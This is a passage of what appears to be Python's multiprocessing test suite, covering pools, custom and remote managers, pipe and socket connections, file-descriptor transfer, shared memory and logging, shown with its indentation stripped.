it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(1000)))
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=53)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
self.assertRaises(ValueError, multiprocessing.Pool, -1)
self.assertRaises(ValueError, multiprocessing.Pool, 0)
p = multiprocessing.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertLess(join.elapsed, 0.5)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with multiprocessing.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
raise AssertionError('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=5)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
